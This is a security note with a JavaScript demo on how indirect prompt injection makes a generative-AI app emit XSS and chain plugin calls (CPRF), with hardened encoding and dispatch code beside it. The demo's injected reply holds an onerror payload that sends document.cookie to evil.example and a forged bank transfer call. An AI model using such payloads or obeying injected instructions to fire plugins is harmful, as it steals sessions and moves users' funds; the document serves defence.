Fraudulent Scam By Unknown Remote Attacker
Created: 2023-12-23 16:51
#note
The breach: Indirect prompt injection can lead to cross-site scripting (XSS [1]) and cross-plugin request forgery (CPRF [2]), two separate but closely related vulnerabilities. Together they can be used to drive the end user's browser, and the plugins acting on the user's behalf, into actions the user never intended.
The impact: XSS is a vulnerability that lets an attacker inject a malicious script into web pages viewed by other users. It arises when attacker-controlled input (a comment box entry, a retrieved document or, here, a model reply) is written into the page without proper validation or output encoding, so the victim's browser executes it as part of the site. In a generative AI application the path is indirect: the attacker plants instructions in content the model will process (a web page, an email, a plugin result), the model echoes attacker-chosen HTML in its reply, and if the application renders that reply as markup the script runs in the victim's session. From there the script can read any cookies, session tokens or other sensitive information the browser retains for that site, and it can rewrite the content of the HTML page. If the same application incorporates several plugins and its underlying model acts as a confused deputy, the injected instructions can also make it activate another plugin on the user's behalf. That is CPRF: the user's own privileges are used to perform state-changing requests such as transferring funds or changing the account email address. If the user is an administrative account, CPRF can compromise the entire web application.
The mitigation: Both XSS and CPRF are significant security threats in web applications, and each needs more than one mitigation. XSS is mainly about untrusted data being sent to a web browser without proper validation or output encoding, while CPRF is about a plugin being tricked into performing actions on a trusted site without the user's knowledge. Mitigations that apply to both: treat model output as untrusted data and encode or sanitize it before rendering it (a content security policy limits what an injected script can do if encoding is missed somewhere); human-in-the-loop design, so a plugin call, and especially a state-changing one, requires explicit user confirmation; never let the result of one plugin invoke another plugin automatically; and tailor plugin permissions to the minimum each plugin needs, keeping sensitive information out of plugins that do not require it.
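The two paths above (model text rendered as markup, and a model-emitted plugin call executed without confirmation) next to their hardened forms, as an added example that is not code from the original note. It simulates the chat UI and plugin layer of a generative AI app in plain JavaScript; the plugin registry, the `bank`/`browse` plugin names and the injected model reply are constructed for the example.

```javascript
// Added example, not code from the original note. Simulates the rendering and
// plugin-dispatch layers of a generative-AI chat app to show (a) model output
// rendered as raw HTML becoming XSS and (b) an unconfirmed plugin call becoming
// CPRF, beside the hardened versions. All names and data here are constructed.

// Constructed: what a model reply looks like after it ingested a web page
// (via a "browse" plugin) carrying hidden instructions. The text contains an
// injected event handler; the tool call targets a second, state-changing plugin.
const INJECTED_REPLY = {
  text: 'Summary of the page: <img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">',
  toolCalls: [{ plugin: 'bank', action: 'transfer', args: { to: '9999', amount: 500 } }],
};

// ---- Rendering ------------------------------------------------------------

// VULNERABLE: the model's text is interpolated into markup as if it were trusted.
// In a browser this string would be assigned to innerHTML and the onerror
// handler would run with the victim's cookies and session.
function renderUnsafe(reply) {
  return `<div class="msg">${reply.text}</div>`;
}

// HARDENED: encode the five HTML-significant characters so the model's text can
// only be displayed, never parsed as markup.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function renderSafe(reply) {
  return `<div class="msg">${escapeHtml(reply.text)}</div>`;
}

// ---- Plugin dispatch ------------------------------------------------------

// Constructed plugin registry: each action declares whether it changes state.
const PLUGINS = {
  browse: { fetch: { stateChanging: false } },
  bank: { balance: { stateChanging: false }, transfer: { stateChanging: true } },
};

function lookup(call) {
  return PLUGINS[call.plugin] && PLUGINS[call.plugin][call.action];
}

// VULNERABLE: every tool call the model emits is executed, regardless of what
// made the model emit it. This is the confused-deputy path to CPRF.
function dispatchUnsafe(call) {
  return lookup(call) ? { allowed: true } : { allowed: false, reason: 'unknown plugin or action' };
}

// HARDENED dispatcher.
//   origin:  'user'   - the request stems from text the human typed
//            'plugin' - the model produced it after ingesting plugin/web content
//   confirm: human-in-the-loop callback; must return true for the call to proceed
function dispatchSafe(call, origin, confirm) {
  const spec = lookup(call);
  if (!spec) return { allowed: false, reason: 'unknown plugin or action' };
  // Rule 1: content returned by one plugin must never trigger another plugin.
  if (origin !== 'user') return { allowed: false, reason: 'plugin-to-plugin invocation blocked' };
  // Rule 2: state-changing actions need explicit confirmation every time.
  if (spec.stateChanging && !confirm(call)) return { allowed: false, reason: 'user declined' };
  return { allowed: true };
}

// One assistant turn under the hardened rules: encode the text, filter the calls.
function handleTurn(reply, origin, confirm) {
  return {
    html: renderSafe(reply),
    executed: reply.toolCalls.filter((c) => dispatchSafe(c, origin, confirm).allowed),
  };
}

// Prints the vulnerable and hardened results side by side and returns them.
function demo() {
  const out = {
    unsafeHtml: renderUnsafe(INJECTED_REPLY),
    safeHtml: renderSafe(INJECTED_REPLY),
    unsafeDispatch: dispatchUnsafe(INJECTED_REPLY.toolCalls[0]),
    safeDispatch: dispatchSafe(INJECTED_REPLY.toolCalls[0], 'plugin', () => true),
    turn: handleTurn(INJECTED_REPLY, 'plugin', () => true),
  };
  console.log(JSON.stringify(out, null, 2));
  return out;
}
```

Run `demo()` with node to see the contrast: the unsafe renderer emits the `onerror` handler intact, the safe one emits `&lt;img ...&gt;` which the browser only displays; the unsafe dispatcher executes the transfer, while the safe one refuses it because the call originated from plugin content, and would still require the user's confirmation even if it had been typed by the user. The origin label is the important design choice: the app, not the model, has to track whether the current turn was influenced by untrusted content, because the model cannot be relied on to report that honestly once it has been injected.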